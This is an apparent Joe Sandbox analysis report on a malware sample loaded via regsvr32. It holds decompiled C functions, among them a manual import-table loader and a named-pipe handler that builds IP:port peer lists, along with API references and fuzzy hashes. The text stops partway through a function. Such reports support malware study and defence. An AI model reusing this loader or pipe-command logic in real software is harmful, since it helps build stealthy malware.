            0x009a3f54
            0x00000000
            0x009a3f17
            0x009a3dfa
            0x009a3e08
            0x009a3e0d
            0x009a3e18
            0x009a3e1b
            0x009a3e1f
            0x009a3e21
            0x009a3e31
            0x009a3e3a
            0x009a3e43
            0x009a3e4b
            0x009a3e54
            0x009a3e5f
            0x009a3e65
            0x009a3e68
            0x009a3e6b
            0x009a3e72
            0x009a3e79
            0x00000000
            0x00000000
            0x009a3e84
            0x009a3e92
            0x009a3e9d
            0x009a3ea7
            0x009a3ebf
            0x009a3ecc
            0x009a3ecc
            0x009a3ea9
            0x009a3eb4
            0x009a3eb4
            0x009a3ed3
            0x009a3ed3
            0x009a3edb
            0x009a3edb
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 009A3F2E
            • LoadLibraryA.KERNEL32(00000000), ref: 009A3F47
            • GetProcAddress.KERNEL32(00000000,?), ref: 009A3FA3
            • GetProcAddress.KERNEL32(00000000,?), ref: 009A3FC2
            • lstrcmpA.KERNEL32(?,00000000), ref: 009A40B3
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: ab21e88e1c16fba145b4098988e47a53d7becf20e6edd2290c4f2f2c82b5f74a
            • Instruction ID: 547050b62350abd27cb5bea92c5b87b5af49ca8f0fe36c7880b4849dc6d80f69
            • Opcode Fuzzy Hash: ab21e88e1c16fba145b4098988e47a53d7becf20e6edd2290c4f2f2c82b5f74a
            • Instruction Fuzzy Hash: 62E1BF74E14219DFCB14CFA8C880AADBBF5FF4A314F248569E915AB350C774AA81DF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A1A0A Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: 56cd2a8acc6bd891eb71f3b6f549370390f9ea9cf647b84f537f41ee06e976d0
            • Instruction ID: 89f7bfe26e84a7782e5b9248efa0a8219d5c4621ba622b967b6e3b63e085591c
            • Opcode Fuzzy Hash: 56cd2a8acc6bd891eb71f3b6f549370390f9ea9cf647b84f537f41ee06e976d0
            • Instruction Fuzzy Hash: B1411A71B0420AABDF244DAC8D9EBBE369CEF43714F280567FD02D6284E265CD90D2E1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A33DA Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E009A33DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L009A3533();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E009A33B3(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E00998ECB(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x9a1bc5
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













            0x009a33da
            0x009a33dd
            0x009a33e2
            0x009a33e6
            0x009a33e6
            0x009a33ec
            0x009a33f0
            0x009a33f1
            0x009a33f4
            0x009a33f5
            0x009a33fa
            0x009a33fd
            0x009a33fe
            0x009a3403
            0x009a340a
            0x009a3493
            0x009a3493
            0x00000000
            0x009a3415
            0x009a3416
            0x009a3428
            0x009a344e
            0x009a344e
            0x009a3457
            0x009a3459
            0x009a345f
            0x009a348e
            0x009a348e
            0x009a3496
            0x009a3499
            0x009a3499
            0x009a3461
            0x009a3462
            0x009a3468
            0x009a346a
            0x009a346a
            0x009a346f
            0x009a346e
            0x009a346e
            0x009a3476
            0x009a3482
            0x009a348c
            0x009a348c
            0x00000000
            0x009a3438
            0x009a3438
            0x009a3438
            0x009a343e
            0x00000000
            0x00000000
            0x009a3440
            0x009a3446
            0x009a344b
            0x00000000
            0x009a344b
            0x009a3428

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: 45dd96d5a27f78c8e1868741482d4ce1447b4f66a884bd0fbc679119480fa4b1
            • Instruction ID: 2168467c2d0a4b18fc01838acd339f501ec52a8bb18f54641144988eaa8df4f3
            • Opcode Fuzzy Hash: 45dd96d5a27f78c8e1868741482d4ce1447b4f66a884bd0fbc679119480fa4b1
            • Instruction Fuzzy Hash: D3213A32A0461527DB225E6DEC86BAB37DC9F4B764F18C165FC4886291EBA4DF4043D1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00993775 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310pipeCOMMON
            Download Yara Rule
            C-Code - Quality: 62%
            			E00993775(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t136;
				signed int _t145;
				signed int _t147;
				signed short* _t148;
				signed int _t158;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				signed short* _t191;
				void* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t207;
				void* _t209;
				void* _t215;
				void* _t222;

				_t222 = __fp0;
				_t209 = (_t207 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x9af8d0; // 0x452f8c0
					_push(0);
					_push( *0x9af8b4);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x9af8d0; // 0x452f8c0
					_push(0x80000);
					_push( *0x9af974);
					_push( *0x9af8b4);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t148 =  *0x9af974; // 0x0
						_t80 =  *_t148 & 0x0000ffff;
						_t215 = _t80 - 8;
						if(_t215 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E009A09C3( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t186);
								E0099D297(_t186);
								L32:
								L56:
								DisconnectNamedPipe( *0x9af8b4);
								_push(0);
								_pop(0);
								_push(1);
								_pop(1);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E009916B0( &_v204, _t222);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t145 = _v204;
								_t90 = _t145 * 0x16;
								_v184 = _t145 * 0x16;
								_t203 = E00998DC9(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t187 = 0xa;
									E0099D297(_t187);
									L52:
									E00998DDF( &_v188, _t145);
									goto L32;
								}
								_t198 = 0;
								__eflags = _t145;
								if(_t145 == 0) {
									L50:
									_push(E0099A5D0(_t203));
									_push(_t203);
									_t188 = 5;
									E0099D297(_t188);
									E00998DDF( &_v192, 0xffffffff);
									_t209 = _t209 + 0x10;
									goto L52;
								}
								_t158 = _v188 + 4;
								__eflags = _t158;
								_v204 = _t158;
								do {
									__eflags = _t198;
									if(_t198 != 0) {
										__eflags = _t198 - _t145 - 1;
										if(_t198 < _t145 - 1) {
											_t102 = E0099A5D0(_t203);
											_t158 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t158;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E0099A5D0(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E0099A5D0(_t203) + _t203;
										__eflags = _t110;
										E00999FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t158 = _v204;
										_t209 = _t209 + 0x20;
									}
									_t198 = _t198 + 1;
									_t158 = _t158 + 0x20;
									_v204 = _t158;
									__eflags = _t198 - _t145;
								} while (_t198 < _t145);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E009916B0( &_v204, _t222);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E00998DDF( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t215 == 0) {
							_t84 = E009A09C3( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t199 = E00999D29( &(_t148[4]), 0x20, 1,  &_v176);
							_v196 = _t199;
							__eflags = _t199;
							if(_t199 == 0) {
								L30:
								_t191 =  *0x9af974; // 0x0
								E0099A06E( &_v164,  &(_t191[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E00991D97(E0099A102( *_t199, __eflags), 0, 0, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E00998DC9(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t147 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E00991D97(E0099A102( *_t199, __eflags), _t127, _v184, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t129;
								E00999E22( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E00999A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0099A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
								_t182 = _v204;
								_t147 = _t147 + 1;
								 *_t182 = _t132;
								_v204 = _t182 + 4;
								__eflags = _t147 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t195 = 5;
							E0099D297(_t195);
							 *0x9af9a8 = 1;
							_v172 = 1;
							goto L56;
						}
						_t136 = _t133;
						if(_t136 == 0) {
							_t84 = E009A09A1( &_v200);
							goto L16;
						}
						if(_t136 != 1) {
							goto L56;
						}
						E009A09A1( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































            0x00993775
            0x0099377b
            0x00993788
            0x0099378d
            0x00993791
            0x00993791
            0x00993796
            0x00993797
            0x0099379d
            0x009937a9
            0x00000000
            0x00000000
            0x009937bc
            0x009937c1
            0x009937c2
            0x009937c7
            0x009937cc
            0x009937d2
            0x009937e0
            0x00993aec
            0x00000000
            0x009937f1
            0x009937f1
            0x009937f7
            0x009937fa
            0x009937fd
            0x0099396b
            0x0099396b
            0x0099396e
            0x00993ae2
            0x0099382c
            0x0099382d
            0x00993831
            0x00993831
            0x00993833
            0x00993833
            0x00993834
            0x0099394f
            0x0099394f
            0x00993950
            0x00993955
            0x00993af2
            0x00993af8
            0x00993b03
            0x00993b05
            0x00993b06
            0x00993b08
            0x00993b09
            0x00000000
            0x00000000
            0x00000000
            0x00993b09
            0x00993975
            0x00993975
            0x00993978
            0x009939bd
            0x009939c1
            0x009939c6
            0x009939ca
            0x009939cc
            0x00993acd
            0x00993ad3
            0x00993ad7
            0x00993852
            0x00993852
            0x00000000
            0x00993852
            0x009939d2
            0x009939d6
            0x009939da
            0x009939e3
            0x009939e5
            0x009939ea
            0x009939ec
            0x00993aa7
            0x00993aa7
            0x00993aa7
            0x00993ab0
            0x00993ab2
            0x00993ab5
            0x00993ab6
            0x00993abd
            0x00993ac3
            0x00000000
            0x00993ac3
            0x009939f2
            0x009939f4
            0x009939f6
            0x00993a85
            0x00993a8c
            0x00993a8d
            0x00993a90
            0x00993a91
            0x00993a9d
            0x00993aa2
            0x00000000
            0x00993aa2
            0x00993a00
            0x00993a00
            0x00993a03
            0x00993a07
            0x00993a07
            0x00993a09
            0x00993a0e
            0x00993a10
            0x00993a13
            0x00993a19
            0x00993a1d
            0x00993a1d
            0x00993a10
            0x00993a23
            0x00993a25
            0x00993a29
            0x00993a2b
            0x00993a2e
            0x00993a35
            0x00993a3e
            0x00993a44
            0x00993a49
            0x00993a52
            0x00993a6a
            0x00993a6a
            0x00993a6d
            0x00993a72
            0x00993a76
            0x00993a76
            0x00993a79
            0x00993a7a
            0x00993a7d
            0x00993a81
            0x00993a81
            0x00000000
            0x00993a07
            0x0099397a
            0x0099397d
            0x00000000
            0x00000000
            0x00993987
            0x0099398b
            0x00993990
            0x00993994
            0x00993998
            0x0099399a
            0x009939a2
            0x009939a8
            0x009939ac
            0x009939b0
            0x00000000
            0x009939b0
            0x00993803
            0x00993961
            0x00993845
            0x00993846
            0x00993848
            0x00993850
            0x00993851
            0x00000000
            0x00993851
            0x0099384a
            0x00000000
            0x0099384a
            0x00993809
            0x0099380c
            0x00993884
            0x00993886
            0x0099388c
            0x0099388e
            0x0099392b
            0x0099392b
            0x0099393d
            0x00993943
            0x0099394c
            0x0099394d
            0x00000000
            0x0099394d
            0x00993894
            0x00993898
            0x0099389b
            0x0099391f
            0x00993924
            0x00993927
            0x00000000
            0x00993927
            0x0099389d
            0x009938a0
            0x009938a8
            0x009938ad
            0x009938b2
            0x009938b4
            0x00000000
            0x00000000
            0x009938b8
            0x009938b9
            0x009938bb
            0x009938ea
            0x009938f9
            0x009938fe
            0x00993901
            0x0099390d
            0x00000000
            0x0099390d
            0x009938bd
            0x009938c1
            0x009938cf
            0x009938d4
            0x009938d8
            0x009938d9
            0x009938de
            0x009938e2
            0x009938e2
            0x009938e6
            0x00000000
            0x009938e6
            0x0099380e
            0x00993811
            0x00993859
            0x0099385a
            0x0099385d
            0x0099385e
            0x00993865
            0x0099386b
            0x00000000
            0x0099386b
            0x00993814
            0x00993817
            0x00993840
            0x00000000
            0x00993840
            0x0099381c
            0x00000000
            0x00000000
            0x00993827
            0x00000000
            0x00993827
            0x009937e0
            0x00993b17

            APIs
            • GetLastError.KERNEL32 ref: 009937AB
              • Part of subcall function 0099D297: FlushFileBuffers.KERNEL32(00000000,?,00993ABB,00000000,00000004), ref: 0099D2DD
            • DisconnectNamedPipe.KERNEL32 ref: 00993AF8
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: 0f3d1dea1d57dbb4ac2a980a8754096f35b4aeae0fcf44b44133152b2904f46f
            • Instruction ID: 6ce747cee5bcd247f0ea31ae332c10038ad5683399a4f4def1a0f0bccba032cd
            • Opcode Fuzzy Hash: 0f3d1dea1d57dbb4ac2a980a8754096f35b4aeae0fcf44b44133152b2904f46f
            • Instruction Fuzzy Hash: 18A1AD72508302AFDB14EF6DD885B2BB7ECEFC5310F14892EF59586181EB34DA058B92
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A376C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E009A376C(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0099F024(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























            0x009a376c
            0x009a3772
            0x009a377a
            0x009a378f
            0x009a37a1
            0x009a37ad
            0x009a37b3
            0x009a37b8
            0x009a37c4
            0x009a392f
            0x00000000
            0x009a392f
            0x009a37ca
            0x009a37d3
            0x009a37e1
            0x009a37e4
            0x009a37f3
            0x009a37f3
            0x009a37fa
            0x009a3808
            0x009a380b
            0x009a3828
            0x009a382f
            0x009a383f
            0x009a3857
            0x009a3841
            0x009a3849
            0x009a3849
            0x009a385a
            0x009a385e
            0x009a386a
            0x009a386e
            0x009a3872
            0x009a3876
            0x009a3882
            0x009a38ad
            0x009a38b5
            0x009a38c7
            0x009a38d3
            0x009a3884
            0x009a3889
            0x009a3894
            0x009a38a0
            0x009a38a0
            0x009a38dc
            0x009a38e2
            0x009a38ec
            0x009a3908
            0x009a38ee
            0x009a38fd
            0x009a38fd
            0x009a38ec
            0x009a3910
            0x009a3919
            0x009a3919
            0x009a3927
            0x00000000
            0x009a3927
            0x009a3833
            0x00000000
            0x009a3833
            0x00000000
            0x009a380b
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 009A3789
            • LoadLibraryA.KERNEL32(00000000), ref: 009A3822
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: 445cf8c017b922eaa9ed6701bf72ef30507107003ffee05fe18d1aeac340b5f5
            • Instruction ID: 611a3a753f092126f2a2cb1292f4c6341ff76942530e167bfcd17fab54791215
            • Opcode Fuzzy Hash: 445cf8c017b922eaa9ed6701bf72ef30507107003ffee05fe18d1aeac340b5f5
            • Instruction Fuzzy Hash: 90618D75D00209EFDB00CF98C885BADBBF1FF49315F248599E855AB2A1C374AA80DF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A4160 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
            Download Yara Rule
            C-Code - Quality: 99%
            			E009A4160(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x5d08408b
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x51ec8b55
					_t12 = _t272 + 0x5c; // 0xee85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E009A7180(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E009A5EE0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xee85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E009A6020( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x51ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x51ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8508458b
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x51ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x51ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x830a74c0
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
